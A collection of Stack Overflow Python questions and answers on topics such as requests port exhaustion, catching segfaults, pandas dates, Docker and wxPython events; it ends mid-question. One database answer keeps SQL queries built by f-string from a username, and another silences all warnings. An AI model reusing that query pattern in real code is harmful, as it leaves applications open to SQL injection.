Dataset columns: content (string, 85–101k chars), title (string, 0–150 chars), question (string, 15–48k chars), answers (sequence), answers_scores (sequence), non_answers (sequence), non_answers_scores (sequence), tags (sequence), name (string, 35–137 chars).
Q:
Python requests ConnectionError after few thousands POST requests
I'm currently working on a Python script that executes POST requests a few thousand times to fill dummy data into a database. Each POST request sends a string to our backend, which inserts that string into the database.
The first 10,000 or so requests work fine, but then a ConnectionError appears.
This is a simplified version of my code:
sqlfiller.py
import requests

url = "http://localhost:3100/api"
payload = "test"

# 40 represents all business days in two months
for day in range(40):
    # 600 data entries per day
    for entry in range(600):
        requests.post(url, payload)
As I mentioned, it works fine for a couple of thousand POST requests, but at some point this error appears and the program crashes.
Traceback (most recent call last):
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\connection.py", line 174, in _new_conn
conn = connection.create_connection(
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\util\connection.py", line 95, in create_connection
raise err
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\util\connection.py", line 85, in create_connection
sock.connect(sa)
OSError: [WinError 10048] Normalerweise darf jede Socketadresse (Protokoll, Netzwerkadresse oder Anschluss) nur jeweils einmal verwendet werden
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\connectionpool.py", line 703, in urlopen
httplib_response = self._make_request(
^^^^^^^^^^^^^^^^^^^
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\connectionpool.py", line 398, in _make_request
conn.request(method, url, **httplib_request_kw)
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\connection.py", line 239, in request
super(HTTPConnection, self).request(method, url, body=body, headers=headers)
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\http\client.py", line 1282, in request
self._send_request(method, url, body, headers, encode_chunked)
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\http\client.py", line 1328, in _send_request
self.endheaders(body, encode_chunked=encode_chunked)
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\http\client.py", line 1277, in endheaders
self._send_output(message_body, encode_chunked=encode_chunked)
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\http\client.py", line 1037, in _send_output
self.send(msg)
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\http\client.py", line 975, in send
self.connect()
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\connection.py", line 205, in connect
conn = self._new_conn()
^^^^^^^^^^^^^^^^
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\connection.py", line 186, in _new_conn
raise NewConnectionError(
urllib3.exceptions.NewConnectionError: <urllib3.connection.HTTPConnection object at 0x0000020309A81250>: Failed to establish a new connection: [WinError 10048] Normalerweise darf jede Socketadresse (Protokoll, Netzwerkadresse oder Anschluss) nur jeweils einmal verwendet werden
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\adapters.py", line 489, in send
resp = conn.urlopen(
^^^^^^^^^^^^^
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\connectionpool.py", line 787, in urlopen
retries = retries.increment(
^^^^^^^^^^^^^^^^^^
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\util\retry.py", line 592, in increment
raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='localhost', port=3100): Max retries exceeded with url: /api (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x0000020309A81250>: Failed to establish a new connection: [WinError 10048] Normalerweise darf jede Socketadresse (Protokoll, Netzwerkadresse oder Anschluss) nur jeweils einmal verwendet werden'))
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "D:\Workbench\sqlfiller.py", line 55, in <module>
requests.post(url, payload)
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\api.py", line 115, in post
return request("post", url, data=data, json=json, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\api.py", line 59, in request
return session.request(method=method, url=url, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\sessions.py", line 587, in request
resp = self.send(prep, **send_kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\sessions.py", line 701, in send
r = adapter.send(request, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\adapters.py", line 565, in send
raise ConnectionError(e, request=request)
requests.exceptions.ConnectionError: HTTPConnectionPool(host='localhost', port=3100): Max retries exceeded with url: /api (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x0000020309A81250>: Failed to establish a new connection: [WinError 10048] Normalerweise darf jede Socketadresse (Protokoll, Netzwerkadresse oder Anschluss) nur jeweils einmal verwendet werden'))
The German WinError 10048 message translates to "Only one usage of each socket address (protocol/network address/port) is normally permitted".
Does anyone know what's going on?
Thanks :)
A:
Instead of requests.post, use httplib.HTTPConnection (http.client in Python 3) and reuse the connection. You need to change your code; that will definitely help solve this problem.
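A minimal sketch of that idea, assuming the same local endpoint as the question: one http.client.HTTPConnection is opened once and reused for every POST, so each request no longer consumes a fresh ephemeral port (running out of those ports is what triggers WinError 10048). Whether the connection actually stays open also depends on the server honoring keep-alive; a requests.Session() gives similar connection pooling.
import http.client

# One TCP connection, reused for all requests (hypothetical rewrite of sqlfiller.py)
conn = http.client.HTTPConnection("localhost", 3100)
payload = "test"
headers = {"Content-Type": "text/plain"}

for day in range(40):          # 40 business days in two months
    for entry in range(600):   # 600 data entries per day
        conn.request("POST", "/api", body=payload, headers=headers)
        response = conn.getresponse()
        response.read()        # drain the body so the connection can be reused

conn.close()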
Q:
How to catch SegFault in Python as exception?
Sometimes Python not only throws exceptions but also segfaults.
Over many years of experience with Python I have seen many segfaults; half of them were inside binary modules (C libraries, i.e. .so/.pyd files), and half were inside the CPython binary itself.
When a segfault occurs, the whole Python program terminates with a crash dump (or silently). My question is: if a segfault happens in some block of code or thread, is there any chance to catch it as a regular Exception through except, and thus prevent the whole program from crashing?
It is known that you can use faulthandler, for example through python -q -X faulthandler. Then it creates the following dump when it segfaults:
>>> import ctypes
>>> ctypes.string_at(0)
Fatal Python error: Segmentation fault
Current thread 0x00007fb899f39700 (most recent call first):
File "/home/python/cpython/Lib/ctypes/__init__.py", line 486 in string_at
File "<stdin>", line 1 in <module>
Segmentation fault
But the dump above still terminates the program entirely; instead, I want to catch this traceback as some standard Exception.
Another question is whether I can catch a segfault of Python code inside the C API function PyRun_SimpleString().
A:
The simplest way is to have a "parent" process which launches your app process and checks its exit value: -11 means the process received signal 11, which is SIGSEGV.
import subprocess

SEGFAULT_PROCESS_RETURNCODE = -11

segfaulting_code = "import ctypes ; ctypes.string_at(0)"  # https://codegolf.stackexchange.com/a/4694/115779
try:
    subprocess.run(["python3", "-c", segfaulting_code],
                   check=True)
except subprocess.CalledProcessError as err:
    if err.returncode == SEGFAULT_PROCESS_RETURNCODE:
        print("probably segfaulted")
    else:
        print(f"crashed for other reasons: {err.returncode}")
else:
    print("ok")
EDIT: here is a reproducible example with a Python dump using the built-in faulthandler:
# file: parent_handler.py
import subprocess

SEGFAULT_PROCESS_RETURNCODE = -11

try:
    subprocess.run(["python3", "-m", "dangerous_child.py"],
                   check=True)
except subprocess.CalledProcessError as err:
    if err.returncode == SEGFAULT_PROCESS_RETURNCODE:
        print("probably segfaulted")
    else:
        print(f"crashed for other reasons: {err.returncode}")
else:
    print("ok")

# file: dangerous_child.py
import faulthandler
import time

faulthandler.enable()  # by default will dump on sys.stderr, but can also print to a regular file


def cause_segfault():  # https://codegolf.stackexchange.com/a/4694/115779
    import ctypes
    ctypes.string_at(0)


i = 0
while True:
    print("everything is fine ...")
    time.sleep(1)
    i += 1
    if i == 5:
        print("going to segfault!")
        cause_segfault()
everything is fine ...
everything is fine ...
everything is fine ...
everything is fine ...
everything is fine ...
going to segfault!
Fatal Python error: Segmentation fault
Current thread 0x00007f7a9ab35740 (most recent call first):
File "/usr/lib/python3.8/ctypes/__init__.py", line 514 in string_at
File "/home/stack_overflow/dangerous_child.py", line 9 in cause_segfault
File "/home/stack_overflow/dangerous_child.py", line 19 in <module>
File "<frozen importlib._bootstrap>", line 219 in _call_with_frames_removed
File "<frozen importlib._bootstrap_external>", line 848 in exec_module
File "<frozen importlib._bootstrap>", line 671 in _load_unlocked
File "<frozen importlib._bootstrap>", line 975 in _find_and_load_unlocked
File "<frozen importlib._bootstrap>", line 991 in _find_and_load
File "/usr/lib/python3.8/runpy.py", line 111 in _get_module_details
File "/usr/lib/python3.8/runpy.py", line 185 in _run_module_as_main
probably segfaulted
(outputs from both processes got mixed in my terminal, but you can separate them as you like)
That way you can pinpoint that the problem was caused by the Python call ctypes.string_at.
But as Mark indicated in the comments, you should not trust this too much: if the program got killed, it is because it was doing bad things.
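If you want the crash dump somewhere the parent can read it, rather than interleaved on the child's stderr, faulthandler can also write to a file — a small sketch (the file name is my choice, not from the answer):
# in dangerous_child.py: route the dump to a file instead of sys.stderr
import faulthandler

crash_log = open("crash.log", "w")
faulthandler.enable(file=crash_log)

# in parent_handler.py, after detecting returncode == -11:
# with open("crash.log") as f:
#     print(f.read())  # the Python-level traceback of the segfault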
Q:
comparing types between a class and a dictionary
I am working with dictionaries and classes and I want to check that the dictionaries and the classes have the same field types.
For example, I have a dataclass of this form
@dataclasses.dataclass
class FlatDataclass:
first_field: str
second_field: int
and I have a dictionary of this form
my_dict = {"first_field": "a_string", "second_field": "5"}
I want to check that the values of the dictionary have the right type for the class.
So far I can get the types for the dictionary, from this:
dct_value_types = list(type(x).__name__ for x in list(dct.values()))
returns
['str', 'str']
however
[f.type for f in dataclasses.fields(klass)]
returns
[<class 'str'>, <class 'int'>]
rather than ['str', 'int'], so I can't compare them.
How would you get the types in a way you can compare them?
A:
Either you do this
[f.type.__name__ for f in dataclasses.fields(klass)]
Or you do this
dct_value_types = list(type(x) for x in list(dct.values()))
Notice that I added or removed __name__ here; both type checks should either have it or not.
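For example, a quick end-to-end check using the FlatDataclass and dictionary from the question (a sketch of the first variant):
import dataclasses

@dataclasses.dataclass
class FlatDataclass:
    first_field: str
    second_field: int

my_dict = {"first_field": "a_string", "second_field": "5"}

expected = [f.type.__name__ for f in dataclasses.fields(FlatDataclass)]
actual = [type(v).__name__ for v in my_dict.values()]

print(expected)            # ['str', 'int']
print(actual)              # ['str', 'str']
print(expected == actual)  # False: "5" is a str, not the int the class expects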
A:
You can use this function that checks if all the fields in the dataclass are present in a given dictionary and have same type -
def has_all_fields(d, custom_class):
    return all(field.name in d and isinstance(d[field.name], field.type)
               for field in dataclasses.fields(custom_class))


@dataclasses.dataclass
class FlatDataclass:
    first_field: str
    second_field: int


my_dict = {"first_field": "a_string", "second_field": 5}
print(has_all_fields(my_dict, FlatDataclass))
Output:
True
Note that this would still return True if dictionary has more fields than what the dataclass does.
Q:
Date format conversion to text (yyyymmdd)
I have a date in the format YYYY-MM-DD (2022-11-01). I want to convert it to 'YYYYMMDD' format (without hyphens). Please help.
I tried this, but no luck:
df['ConvertedDate'] = df['DateOfBirth'].dt.strftime('%m/%d/%Y')
A:
If I understand correctly, the format mask you should be using with strftime is %Y%m%d:
df["ConvertedDate"] = df["DateOfBirth"].dt.strftime('%Y%m%d')
A:
Pandas itself providing the ability to convert strings to datetime in Pandas dataFrame with desire format.
df['ConvertedDate'] = pd.to_datetime(df['DateOfBirth'], format='%Y-%m-%d').dt.strftime('%Y%m%d')
Referenced Example:
import pandas as pd
values = {'DateOfBirth': ['2021-01-14', '2022-11-01', '2022-11-01']}
df = pd.DataFrame(values)
df['ConvertedDate'] = pd.to_datetime(df['DateOfBirth'], format='%Y-%m-%d').dt.strftime('%Y%m%d')
print (df)
Output:
DateOfBirth ConvertedDate
0 2021-01-14 20210114
1 2022-11-01 20221101
2 2022-11-01 20221101
A:
This works:
from datetime import datetime

initial = "2022-11-01"
time = datetime.strptime(initial, "%Y-%m-%d")
print(time.strftime("%Y%m%d"))
Q:
Looping through strings and replacing adjoining characters
I need to know how to switch 2 characters in a string. For example, I have:
###################################
#### ######################
#### ### ### ####
#### ### ### ####
#### ### ####
o ### ##################
###################################
I want this to be like moving throughout the "House", so I have a program that receives input from the user via the WASD keys. When pressing 'D', the 'o' will move to the right; when pressing 'W', it will go up, etc.
Since I want to do that, I would have to switch the 'o' with the space to its right, or the 'o' with the space above it. Is there an easy, efficient way of doing this? I searched the web and found some related results, but since I'm a beginner I don't really understand them, because they were using complicated functions and string slicing. Could somebody give me some code to do this?
I have tried things like:
if input.lower() == 'w':
    House = '''
###################################
#### ######################
#### ### ### ####
#### ### ### ####
#### ### ####
o ### ##################
###################################
'''
But it would take me way too long to manually write out every single position change, so can someone answer with code showing how to do this?
A:
I'm assuming you are working with a map that's printed in the terminal.
You should think of the house as a 2-dimensional array where the 0s are free space and the 1s are the wall (or the other way around, that's just preference).
That way, when you are printing the map, you are just printing an empty space, a #, or the player's marker:
Map = [
    [0,1,0,1,1,1,0,1],
    [1,0,0,1,0,1,1,0],
    ....
]
The position of the player is a position in that array:
Player = [2,5] ## Third Row Sixth Column
Based on that you can calculate where the player can move:
Up: [1,5]
Down: [3,5]
Left: [2,4]
Right: [2,6]
Once the player has made his move, print the map again with something that could look like this:
def PrintMap(Map, Player=[0, 0]):
    for i, row in enumerate(Map):
        Row = ''
        for j, cell in enumerate(row):
            if [i, j] == Player:
                Row = Row + 'o'
            elif cell == 0:
                Row = Row + ' '
            else:
                Row = Row + '#'
        print(Row)
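A hedged sketch of the key handling itself, assuming the Map/Player layout above (0 = free space, 1 = wall) and simple input() polling:
# Hypothetical WASD handling for the scheme above
moves = {'w': (-1, 0), 's': (1, 0), 'a': (0, -1), 'd': (0, 1)}

key = input("Move (w/a/s/d): ").lower()
if key in moves:
    di, dj = moves[key]
    ni, nj = Player[0] + di, Player[1] + dj
    # only move if the target cell is inside the map and not a wall
    if 0 <= ni < len(Map) and 0 <= nj < len(Map[0]) and Map[ni][nj] == 0:
        Player = [ni, nj]
PrintMap(Map, Player)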
Q:
Speaker Diarization
I am trying to do speaker diarization using the pyannote library using the code below:
from pyannote.audio import Pipeline
pipeline = Pipeline.from_pretrained("pyannote/speaker-diarization")
diarization = pipeline("audio.wav")
for turn, _, speaker in diarization.itertracks(yield_label=True):
    print(f"start={turn.start:.1f}s stop={turn.end:.1f}s speaker_{speaker}")
However, I am not able to import Pipeline. Whenever I try to import it in PyCharm, I install the package but it still gives me an error that it doesn't exist. This is the error message: Cannot find reference 'Pipeline' in '__init__.py'. Can you help me fix this error?
A:
I was getting the same error.
I fixed it by creating a virtual environment and then importing it there, it worked.
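For reference, creating and using a virtual environment typically looks like this (a sketch, assuming a Unix-like shell; on Windows the activate script lives under venv\Scripts, and the script name is hypothetical):
python3 -m venv venv
source venv/bin/activate
pip install pyannote.audio
python your_script.py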
Q:
How to fix a warning in pytest
I run tests using pytest. Some kind of warning appears in the terminal; I could just ignore it, but I would like to remove it from the terminal output.
RemovedInDjango50Warning: The USE_L10N setting is deprecated. Starting with Django 5.0, localized formatting of data will always be enabled. For example Django will display numbers and dates using the format of the current locale.
warnings.warn(USE_L10N_DEPRECATED_MSG, RemovedInDjango50Warning)
Help me, please!!!!!!
A:
At the top of your Python script, add the following 2 lines of code:
import warnings
warnings.filterwarnings(action="ignore")
This will hide all warnings from the terminal.
Hope this helps :)
A:
It was necessary to add these lines to the project settings:
import warnings
warnings.filterwarnings(action="ignore")
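If you'd rather not suppress warnings in application code, pytest also has a built-in filterwarnings ini option — a sketch, assuming the Django deprecation warning is a DeprecationWarning/PendingDeprecationWarning subclass:
# pytest.ini
[pytest]
filterwarnings =
    ignore::DeprecationWarning
    ignore::PendingDeprecationWarning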
Q:
Pip package version conflicts despite seemingly matching ranges
When using pip install -r requirements.txt, I get ERROR: Cannot install -r requirements.txt (line 3), [...] because these package versions have conflicting dependencies..
And further:
The conflict is caused by:
tensorflow 2.11.0 depends on protobuf<3.20 and >=3.9.2
tensorboard 2.11.0 depends on protobuf<4 and >=3.9.2
wandb 0.13.5 depends on protobuf!=4.0.*, !=4.21.0, <5 and >=3.12.0
I don't see any conflicts in these ranges - every version in [3.12.0, 3.20) should be fine. Can someone explain the problem?
Update: As a workaround, I removed all version restrictions and only specified the names of the libraries in the requirements.txt file. Now it works. But I still don't see a problem with the above ranges, so I'll leave the question open.
A:
I would suggest that, rather than using a range of versions, use a specific version you know works. That way, there won't be any problems.
I think that one of the versions of the dependencies is incompatible with the main module, and since it is within the range of versions you ask for, pip tries to install it and fails to do so since it is incompatible.
Also, pip normally handles dependencies automatically.
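For instance, a hypothetical pin set that satisfies all three constraints quoted in the question (protobuf 3.19.x lies inside every stated range):
tensorflow==2.11.0
tensorboard==2.11.0
wandb==0.13.5
protobuf==3.19.6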
Q:
Django: How to check if something is an email without a form
I have an HTML form posting to a Django view, and because of some constraints it's easier for me to do the validation without the usual Django form classes.
My only reason to use Django forms is the email field(s) that are entered.
Is there any function to check if something is an email, or do I have to use the EmailField to check and validate it?
A:
You can use the following:
from django.core.validators import validate_email
from django import forms

...
if request.method == "POST":
    try:
        validate_email(request.POST.get("email", ""))
    except forms.ValidationError:
        ...
assuming you have a <input type="text" name="email" /> in your form
A:
You can use the validate_email() method from django.core.validators:
>>> from django.core import validators
>>> validators.validate_email('[email protected]')
>>> validators.validate_email('test@examplecom')
Traceback (most recent call last):
File "<console>", line 1, in <module>
File "/Users/jasper/Sites/iaid/env/lib/python2.7/site- packages/django/core/validators.py", line 155, in __call__
super(EmailValidator, self).__call__(u'@'.join(parts))
File "/Users/jasper/Sites/iaid/env/lib/python2.7/site-packages/django/core/validators.py", line 44, in __call__
raise ValidationError(self.message, code=self.code)
ValidationError: [u'Enter a valid e-mail address.']
A:
Using Python, with a regular expression to validate the email:
import re

def check_email(email) -> bool:
    # The regular expression (note: [A-Za-z], not [A-Z|a-z] -- the pipe would match a literal '|')
    pat = r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b'
    if re.match(pat, email):
        return True
    else:
        return False

Using Django (but this raises a ValidationError on failure):
from django.core import validators
validators.validate_email("[email protected]")
Q:
How to use PyGithub with Streamlit to build a webapp
I want to create a script, deployed with Streamlit in Python, that lists the contents of a specific repository. Is it even possible? Because I'm trying it and it always says this:
ImportError: cannot import name 'Github' from 'github' (/Library/Frameworks/Python.framework/Versions/3.9/lib/python3.9/site-packages/github/__init__.py)
Traceback:
File "/Library/Frameworks/Python.framework/Versions/3.9/lib/python3.9/site-packages/streamlit/runtime/scriptrunner/script_runner.py", line 564, in _run_script
exec(code, module.__dict__)
File "/Users/blanc/Desktop/My-notes/webpage.py", line 1, in <module>
from github import Github
I have literally this import, which works with output in the console:
from github import Github
I've checked like 18 times that I have the requirements installed (and the correct version of PyGithub) and I don't know what else I can do.
Hope you can help me :)
This is the code I'm using:
from github import Github

def list_content_repo():
    g = Github()
    # github username
    username = g.get_user("gitblanc")
    # Obtain the repository
    repo = username.get_repo("Obsidian-Notes")
    print(repo.get_contents(""))
A:
Just to let you know that I don't have issues with pygithub and streamlit.
Code
main.py
from github import Github
import streamlit as st


def list_content_repo():
    g = Github()
    username = g.get_user("gitblanc")
    repo = username.get_repo("Obsidian-Notes")
    contents = repo.get_contents("")

    st.write('#### Contents')
    st.write(contents)


if __name__ == '__main__':
    list_content_repo()
Output
Setup
Try to setup your development environment this way. Let us see if you still have an issue. I am using windows 10 and use virtual environment. Open powershell.
PS C:\Users\ferdi> f:
I use drive f.
PS F:\> mkdir temp_streamlit
PS F:\> cd temp_streamlit
PS F:\temp_streamlit> python --version
Python 3.10.6
PS F:\temp_streamlit> python -m venv myvenv
PS F:\temp_streamlit> ./myvenv/scripts/activate
(myvenv) PS F:\temp_streamlit> python -m pip install pip -U
(myvenv) PS F:\temp_streamlit> pip install streamlit
(myvenv) PS F:\temp_streamlit> pip install pygithub
Create main.py using the above code and run streamlit.
(myvenv) PS F:\temp_streamlit> streamlit run main.py
You should see the same output above.
Q:
cursor.fetchone() returns NoneType but it has value, how to collect values in a list?
def get_user_data(username: str, columns: list):
    result = []
    for column in columns:
        query = f"SELECT {column} FROM ta_users WHERE username = '{username}'"
        cursor.execute(query)
        print('cursor.fetchone() from loop = ', cursor.fetchone(),
              'type= ', type(cursor.fetchone()))  # debug
        fetchone = cursor.fetchone()
        result.append(fetchone[0])
raises:
result.append(fetchone[0])
TypeError: 'NoneType' object is not subscriptable
the print above returns:
cursor.fetchone() from loop = ('6005441021308034',) type= <class 'NoneType'>
I read about why it can return None, but I did not figure out how to work around it.
How do I make it work and return a list of values after the loop?
A:
You are "emptying" it in the first fetchone() run, that's why you are getting None in the following (it looks for the second record, but can't find it. Try this code:
def get_user_data(username: str, columns: list):
    result = []
    for column in columns:
        query = f"SELECT {column} FROM ta_users WHERE username = '{username}'"
        cursor.execute(query)
        res = cursor.fetchone()
        print('cursor.fetchone() from loop = ', res,
              'type= ', type(res))  # debug
        if res:
            result.append(res[0])
    return result
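As a side note, the original loop also runs one query per column. A sketch of fetching all columns in a single query instead (assuming a psycopg2-style driver with %s placeholders; column names cannot be parameterized, so columns must come from trusted code):
def get_user_data(username: str, columns: list):
    cols = ", ".join(columns)  # identifiers must be trusted / whitelisted
    cursor.execute(
        f"SELECT {cols} FROM ta_users WHERE username = %s", (username,)
    )
    row = cursor.fetchone()
    return list(row) if row else []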
Q:
Docker Run two unending programs python
I am trying to run a Flask server (app.py) and a script which, every 5 minutes, sends a request to that server.
Dockerfile
FROM ubuntu:18.04
RUN apt-get update -y && apt-get install -y python3 python3-pip
COPY ./requirement.txt /app/requirement.txt
WORKDIR /app
RUN pip3 install -r requirement.txt
COPY ./src /app
EXPOSE 8022
ENTRYPOINT ["python3"]
CMD ["metricRequester.py &"]
CMD ["app.py"]
metricRequester.py
import sched, time
import requests

s = sched.scheduler(time.time, time.sleep)

def sendRequest(sc):
    print("Sending Request")
    requestString = "http://127.0.0.1:8022/"
    try:
        response = requests.get(requestString)
    except Exception as e:
        print("Couldn't send request")
        print(e)
    print("Request sent")
    sc.enter(300, 1, sendRequest, (sc,))

s.enter(300, 1, sendRequest, (s,))
s.run()
When I run app.py and metricRequester.py on my laptop, they both work correctly.
I am trying to make a local Dockerfile which runs both of these scripts.
With my current Dockerfile, only app.py seems to be running: it is reachable on port 8022, but I am not seeing any metrics emails coming through, indicating that metricRequester.py is not running.
How do I rewrite my Dockerfile to allow both scripts to run?
A:
The ideal setup is to have one process running in one container, so it's good to run app.py and metricRequester.py in two separate containers. (This is also why only app.py was running in your original image: when a Dockerfile contains multiple CMD instructions, only the last one takes effect.) So have two Dockerfiles:
Dockerfile 1:
FROM ubuntu:18.04
RUN apt-get update -y && apt-get install -y python3 python3-pip
COPY ./requirement.txt /app/requirement.txt
WORKDIR /app
RUN pip3 install -r requirement.txt
COPY ./src /app
EXPOSE 8022
ENTRYPOINT ["python3"]
CMD ["metricRequester.py"]
Dockerfile2:
FROM ubuntu:18.04
RUN apt-get update -y && apt-get install -y python3 python3-pip
COPY ./requirement.txt /app/requirement.txt
WORKDIR /app
RUN pip3 install -r requirement.txt
COPY ./src /app
EXPOSE 8022
ENTRYPOINT ["python3"]
CMD ["app.py"]
The ports will vary for each container.
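A hypothetical docker-compose.yml tying the two images together; note that once the scripts run in separate containers, the requester would have to target http://app:8022/ instead of 127.0.0.1:
services:
  app:
    build:
      context: .
      dockerfile: Dockerfile2    # runs app.py
    ports:
      - "8022:8022"
  requester:
    build:
      context: .
      dockerfile: Dockerfile1    # runs metricRequester.py
    depends_on:
      - app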
Q:
Take average of range entities and replace it in pandas column
I have a dataframe where one column looks like this:
Average Weight (Kg)
0.647
0.88
0
0.73
1.7 - 2.1
1.2 - 1.5
2.5
NaN
1.5 - 1.9
1.3 - 1.5
0.4
1.7 - 2.9
Reproducible data
df = pd.DataFrame([0.647,0.88,0,0.73,'1.7 - 2.1','1.2 - 1.5',2.5 ,np.NaN,'1.5 - 1.9','1.3 - 1.5',0.4,'1.7 - 2.9'],columns=['Average Weight (Kg)'])
where I would like to take the average of the range entries and replace them in the dataframe, e.g. 1.7 - 2.1 will be replaced by 1.9. The following code doesn't work (TypeError: 'float' object is not iterable):
np.where(df['Average Weight (Kg)'].str.contains('-'),
         df['Average Weight (Kg)'].str.split('-')
           .apply(lambda x: statistics.mean(list(map(float, x)))),
         df['Average Weight (Kg)'])
A:
Another possible solution, which is based on the following ideas:
Convert column to string.
Split each cell by \s-\s.
Explode column.
Convert back to float.
Group by and mean.
df['Average Weight (Kg)'] = df['Average Weight (Kg)'].astype(
    str).str.split(r'\s-\s').explode().astype(float).groupby(level=0).mean()
Output:
Average Weight (Kg)
0 0.647
1 0.880
2 0.000
3 0.730
4 1.900
5 1.350
6 2.500
7 NaN
8 1.700
9 1.400
10 0.400
11 2.300
A:
edit: slight change to avoid creating a new column
You could go for something like this (renamed your column name to avg, cause it was long to type :-) ):
new_average =(df.avg.str.split('-').str[1].astype(float) + df.avg.str.split('-').str[0].astype(float) ) / 2
df["avg"] = new_average.fillna(df.avg)
yields for avg:
0 0.647
1 0.880
2 0.000
3 0.730
4 1.900
5 1.350
6 2.500
7 NaN
8 1.700
9 1.400
10 0.400
11 2.300
Name: avg2, dtype: float64
Q:
Wxpython: Bind works only on double click, but single click is desired
I have a table with checkboxes. I want to bind the box checking to a method onClick, but that method activates only when I double-click a record, while I want it to be activated on a single click.
import wx
from wx import ListEvent


class MyFrame(wx.Frame):
    def onClick(self, event: ListEvent):
        print(event.EventObject)

    def __init__(self):
        wx.Frame.__init__(self, None, -1, 'List ctrl example', size=(500, 700))
        self._list_ctrl = wx.ListCtrl(self, -1, style=wx.LC_REPORT | wx.LC_SINGLE_SEL)
        self._list_ctrl.InsertColumn(0, 'Checkbox', format=wx.LIST_FORMAT_LEFT, width=50)
        self._list_ctrl.InsertColumn(1, 'Data', format=wx.LIST_FORMAT_LEFT, width=200)
        self._list_ctrl.InsertColumn(2, 'Test', format=wx.LIST_FORMAT_LEFT, width=200)
        # self._list_ctrl.SetColumnWidth(0, 200)
        self._list_ctrl.EnableCheckBoxes()
        for i in range(0, 50):
            # index = self._list_ctrl.InsertItem(i, '')
            self._list_ctrl.InsertItem(0, '')
            self._list_ctrl.SetItem(0, 1, 'item: ' + str(i))
            self._list_ctrl.SetItem(0, 2, 'label')
            self._list_ctrl.CheckItem(0, True)
        self.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.onClick, self._list_ctrl)
        self.Layout()


class MyApp(wx.App):
    def OnInit(self):
        frame = MyFrame()
        frame.Show(True)
        return True


if __name__ == '__main__':
    app = MyApp(False)
    app.MainLoop()
A:
Instead of wx.EVT_LIST_ITEM_ACTIVATED use wx.EVT_LIST_ITEM_SELECTED
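In the posted code that is a one-line change (a sketch, assuming the rest of the example stays the same):
self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.onClick, self._list_ctrl)
If you specifically want to react to the checkbox being toggled rather than the row being selected, recent wxPython versions also provide wx.EVT_LIST_ITEM_CHECKED and wx.EVT_LIST_ITEM_UNCHECKED, which may fit this use case even better.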
| Wxpython: Bind works only on double click, but single click is desired | I have a table with checkboxes. I want to bind the box checking to a method onClick but that method activates only when I double click a record, while I want it to be activated when a single click is pressed.
import wx
from wx import ListEvent
class MyFrame(wx.Frame):
def onClick(self, event: ListEvent):
print(event.EventObject)
def __init__(self):
wx.Frame.__init__(self, None, -1, 'List ctrl example', size=(500, 700))
self._list_ctrl = wx.ListCtrl(self, -1, style=wx.LC_REPORT | wx.LC_SINGLE_SEL)
self._list_ctrl.InsertColumn(0, 'Checkbox', format=wx.LIST_FORMAT_LEFT, width = 50)
self._list_ctrl.InsertColumn(1, 'Data', format=wx.LIST_FORMAT_LEFT, width = 200)
self._list_ctrl.InsertColumn(2, 'Test', format=wx.LIST_FORMAT_LEFT, width = 200)
# self._list_ctrl.SetColumnWidth(0, 200)
self._list_ctrl.EnableCheckBoxes()
for i in range(0, 50):
# index = self._list_ctrl.InsertItem(i, '')
self._list_ctrl.InsertItem(0, '')
self._list_ctrl.SetItem(0, 1, 'item: ' + str(i))
self._list_ctrl.SetItem(0, 2, 'label')
self._list_ctrl.CheckItem(0, True)
self.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.onClick, self._list_ctrl)
self.Layout()
class MyApp(wx.App):
def OnInit(self):
frame = MyFrame()
frame.Show(True)
return True
if __name__ == '__main__':
app = MyApp(False)
app.MainLoop()
| [
"Instead of wx.EVT_LIST_ITEM_ACTIVATED use wx.EVT_LIST_ITEM_SELECTED\n"
] | [
0
] | [] | [] | [
"python",
"user_interface",
"wxpython"
] | stackoverflow_0074602199_python_user_interface_wxpython.txt |
Q:
I am trying to sort a csv alphabetically but it's not happening
I am trying to sort a csv file alphabetically by the package column. I am using this code
import pandas as pandasForSortingCSV
# assign dataset
csvData = pandasForSortingCSV.read_csv("python_packages.csv")
# displaying unsorted data frame
